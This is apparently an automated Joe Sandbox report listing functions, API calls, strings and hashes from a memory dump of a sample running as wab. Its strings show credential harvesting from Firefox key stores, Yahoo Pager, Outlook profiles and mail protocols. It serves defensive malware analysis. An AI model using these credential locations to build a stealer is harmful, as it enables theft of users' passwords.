                                                                                                                  • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                                                                  • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                                                                                  • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                                                                                                  • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                                  • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                                                                  • Part of subcall function 00444059: memcpy.MSVCRT ref: 004440EB
                                                                                                                  • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004441FC
                                                                                                                • CloseHandle.KERNEL32(?), ref: 00444206
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                                                • String ID: ACD
                                                                                                                • API String ID: 1886237854-620537770
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004091EC
                                                                                                                • sprintf.MSVCRT ref: 00409201
                                                                                                                  • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                                                                  • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                                  • Part of subcall function 0040929C: _mbscpy.MSVCRT ref: 004092FC
                                                                                                                • SetWindowTextA.USER32(?,?), ref: 00409228
                                                                                                                • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                                                                • String ID: caption$dialog_%d
                                                                                                                • API String ID: 2923679083-4161923789
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • cannot open savepoint - SQL statements in progress, xrefs: 00426934
                                                                                                                • unknown error, xrefs: 004277B2
                                                                                                                • abort due to ROLLBACK, xrefs: 00428781
                                                                                                                • cannot release savepoint - SQL statements in progress, xrefs: 00426A20
                                                                                                                • no such savepoint: %s, xrefs: 00426A02
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy
                                                                                                                • String ID: abort due to ROLLBACK$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s$unknown error
                                                                                                                • API String ID: 3510742995-3035234601
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset
                                                                                                                • String ID: GROUP$H$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                • API String ID: 2221118986-3608744896
                                                                                                                • Opcode ID: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                                                                                • Instruction ID: b2162d4513fc51f5474afcad34877166e8d447bb02b269bc62d34bb3a2ce53bd
                                                                                                                • Opcode Fuzzy Hash: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                                                                                • Instruction Fuzzy Hash: 43B157B16087118FC720CF29E580A1BB7E5FF88314F90495FE9998B751E738E841CB9A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • memcpy.MSVCRT ref: 00442A5E
                                                                                                                  • Part of subcall function 0044257F: memcmp.MSVCRT ref: 004425C8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcmpmemcpy
                                                                                                                • String ID: BINARY$NOCASE$RTRIM$main$temp
                                                                                                                • API String ID: 1784268899-4153596280
                                                                                                                • Opcode ID: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                                                                                                • Instruction ID: 8c81c6e629260c6e32056db5335e0b2518b1498a844935eff1e92b421965135b
                                                                                                                • Opcode Fuzzy Hash: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                                                                                                • Instruction Fuzzy Hash: 8391F3B1A007009FE730EF25C981B5FBBE4AB44304F50492FF4569B392D7B9E9458B99
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                                                                                                                • memset.MSVCRT ref: 00410246
                                                                                                                • memset.MSVCRT ref: 00410258
                                                                                                                  • Part of subcall function 004100CC: _mbscpy.MSVCRT ref: 004100F2
                                                                                                                • memset.MSVCRT ref: 0041033F
                                                                                                                • _mbscpy.MSVCRT ref: 00410364
                                                                                                                • CloseHandle.KERNEL32(?,0040FE66,?), ref: 004103AE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 3974772901-0
                                                                                                                • Opcode ID: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                                                                                • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                                                                                • Opcode Fuzzy Hash: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                                                                                • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • wcslen.MSVCRT ref: 0044406C
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433A0
                                                                                                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433BE
                                                                                                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433D9
                                                                                                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443402
                                                                                                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443426
                                                                                                                • strlen.MSVCRT ref: 004440D1
                                                                                                                  • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT ref: 00443507
                                                                                                                  • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT ref: 00443516
                                                                                                                • memcpy.MSVCRT ref: 004440EB
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 577244452-0
                                                                                                                • Opcode ID: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
                                                                                                                • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                                                                                • Opcode Fuzzy Hash: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
                                                                                                                • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                  • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                                                                                                                • _strcmpi.MSVCRT ref: 00404518
                                                                                                                • _strcmpi.MSVCRT ref: 00404536
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _strcmpi$memcpystrlen
                                                                                                                • String ID: imap$pop3$smtp
                                                                                                                • API String ID: 2025310588-821077329
                                                                                                                • Opcode ID: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                                                                • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                                                                                • Opcode Fuzzy Hash: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                                                                • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040C02D
                                                                                                                  • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                                  • Part of subcall function 00408DB6: memcpy.MSVCRT ref: 00408EBE
                                                                                                                  • Part of subcall function 00408DB6: _mbscpy.MSVCRT ref: 00408E31
                                                                                                                  • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                  • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                                                                  • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                                                                  • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                                                                  • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407725
                                                                                                                  • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                                                                  • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407743
                                                                                                                  • Part of subcall function 004074EA: _mbscpy.MSVCRT ref: 00407550
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                                                • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                • API String ID: 2726666094-3614832568
                                                                                                                • Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                                                                • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                                                                                • Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                                                                • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00403A88
                                                                                                                • memset.MSVCRT ref: 00403AA1
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AB8
                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403AD7
                                                                                                                • strlen.MSVCRT ref: 00403AE9
                                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AFA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWidememset$FileWritestrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1786725549-0
                                                                                                                • Opcode ID: 89e9c396a026bbeb42c60f6c6870dce76feb575119cfb40fcdc12e2b9f15660d
                                                                                                                • Instruction ID: 75a67b34ad05bb499385cce9778aa698b1b4849105f4284936cacb9952f60aa3
                                                                                                                • Opcode Fuzzy Hash: 89e9c396a026bbeb42c60f6c6870dce76feb575119cfb40fcdc12e2b9f15660d
                                                                                                                • Instruction Fuzzy Hash: 291121B680112CBEFB119BA4DCC5EEB73ADDF09355F0005A6B715D2092E6349F448B78
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                                                                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                                                                                • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                                                                                • OpenClipboard.USER32(?), ref: 0040C1B1
                                                                                                                • GetLastError.KERNEL32 ref: 0040C1CA
                                                                                                                • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                                                                                • String ID:
                                                                                                                • API String ID: 2014771361-0
                                                                                                                • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                                • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                                                                                • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                                • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • memcmp.MSVCRT ref: 00406151
                                                                                                                  • Part of subcall function 0040607F: memcmp.MSVCRT ref: 0040609D
                                                                                                                  • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060CC
                                                                                                                  • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060E1
                                                                                                                • memcmp.MSVCRT ref: 0040617C
                                                                                                                • memcmp.MSVCRT ref: 004061A4
                                                                                                                • memcpy.MSVCRT ref: 004061C1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcmp$memcpy
                                                                                                                • String ID: global-salt$password-check
                                                                                                                • API String ID: 231171946-3927197501
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@
                                                                                                                • String ID:
                                                                                                                • API String ID: 613200358-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetClientRect.USER32(?,?), ref: 004016A3
                                                                                                                • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                                                                                                • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                                                                                                • BeginPaint.USER32(?,?), ref: 004016D7
                                                                                                                • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                                                                                                • EndPaint.USER32(?,?), ref: 004016F3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                                • String ID:
                                                                                                                • API String ID: 19018683-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040644F
                                                                                                                • memcpy.MSVCRT ref: 00406462
                                                                                                                • memcpy.MSVCRT ref: 00406475
                                                                                                                  • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                                                                  • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                                                                  • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                                                                  • Part of subcall function 00404888: memcpy.MSVCRT ref: 004048FC
                                                                                                                  • Part of subcall function 00404888: memcpy.MSVCRT ref: 0040490E
                                                                                                                • memcpy.MSVCRT ref: 004064B9
                                                                                                                • memcpy.MSVCRT ref: 004064CC
                                                                                                                • memcpy.MSVCRT ref: 004064F9
                                                                                                                • memcpy.MSVCRT ref: 0040650E
                                                                                                                  • Part of subcall function 00406286: memcpy.MSVCRT ref: 004062B2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy$memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 438689982-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0044495F
                                                                                                                • memset.MSVCRT ref: 00444978
                                                                                                                • memset.MSVCRT ref: 0044498C
                                                                                                                  • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                                • strlen.MSVCRT ref: 004449A8
                                                                                                                • memcpy.MSVCRT ref: 004449CD
                                                                                                                • memcpy.MSVCRT ref: 004449E3
                                                                                                                  • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D296
                                                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                                  • Part of subcall function 0040D2A3: memcpy.MSVCRT ref: 0040D30F
                                                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                                • memcpy.MSVCRT ref: 00444A23
                                                                                                                  • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D248
                                                                                                                  • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D272
                                                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpymemset$strlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2142929671-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                                                                                • memset.MSVCRT ref: 0040330B
                                                                                                                • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                                                                                • strchr.MSVCRT ref: 0040335A
                                                                                                                  • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                                                                                • strlen.MSVCRT ref: 0040339C
                                                                                                                  • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                                                • String ID: Personalities
                                                                                                                • API String ID: 2103853322-4287407858
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                                • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                                • memcpy.MSVCRT ref: 004108C3
                                                                                                                Strings
                                                                                                                • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 00410875
                                                                                                                • 00000000-0000-0000-0000-000000000000, xrefs: 00410882
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FromStringUuid$memcpy
                                                                                                                • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                                                                                                • API String ID: 2859077140-3316789007
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00444573
                                                                                                                  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                  • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseOpenQueryValuememset
                                                                                                                • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                                                • API String ID: 1830152886-1703613266
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastMessagesprintf
                                                                                                                • String ID: Error$Error %d: %s
                                                                                                                • API String ID: 1670431679-1552265934
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • unknown column "%s" in foreign key definition, xrefs: 00430C59
                                                                                                                • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430A65
                                                                                                                • foreign key on %s should reference only one column of table %T, xrefs: 00430A3D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy
                                                                                                                • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                • API String ID: 3510742995-272990098
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset
                                                                                                                • String ID: H
                                                                                                                • API String ID: 2221118986-2852464175
                                                                                                                • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                                • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                                                                                                                • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                                • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy
                                                                                                                • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                                                                • API String ID: 3510742995-3170954634
                                                                                                                • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                                                • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                                                                                                                • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                                                • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcmp$memcpy
                                                                                                                • String ID: @ $SQLite format 3
                                                                                                                • API String ID: 231171946-3708268960
                                                                                                                • Opcode ID: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                                                                                                                • Instruction ID: bab8e9e22e0f3e3322208b515ecc9156aa125374c4e71f07eecd891e4e8170cf
                                                                                                                • Opcode Fuzzy Hash: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
